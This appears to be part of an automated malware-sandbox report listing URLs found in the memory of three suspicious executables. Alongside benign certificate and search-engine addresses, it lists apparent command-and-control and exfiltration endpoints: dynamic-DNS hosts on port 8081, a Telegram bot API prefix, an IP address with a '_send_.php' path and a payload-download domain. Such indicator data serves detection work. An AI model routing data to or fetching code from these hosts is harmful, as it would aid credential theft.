https://duckduckgo.com/chrome_newtab	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142559161.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AFA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AAC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3168912288.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3169435393.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.2027254818.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402399115.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D092000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402272086.000000002D092000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142559161.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AFA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4142010793.0000000027AAC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3168912288.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3169435393.0000000027B22000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.2027254818.0000000027B24000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402399115.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D02D000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4142897409.000000002D092000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3402272086.000000002D092000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B680000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://amazonenviro.com/	yxU3AgeVTi.exe, 00000000.00000002.1688225604.000000000076E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://amazonenviro.com/245_Aiymwhpjxsgf	yxU3AgeVTi.exe, 00000000.00000002.1688225604.000000000076E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://amazonenviro.com/245_Aiymwhpjxsge	yxU3AgeVTi.exe, 00000000.00000002.1688225604.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	jphwmyiA.pif, 00000003.00000002.4139743451.000000002644C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265AE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026704000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026623000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026844000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B37E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B614000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3F3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B21C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C73E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C7B3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C894000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C9D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	jphwmyiA.pif, 00000003.00000002.4139743451.000000002644C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265AE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026704000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026623000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026844000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B37E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B614000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3F3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B21C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C73E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C7B3000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C894000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C9D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	jphwmyiA.pif, 00000003.00000003.3165124504.00000000266DF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265B4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026589000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4139743451.0000000026427000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000267FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B359000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B1F7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B5CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B384000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4AF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C719000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C744000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5B7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C86F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C98E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	false		high
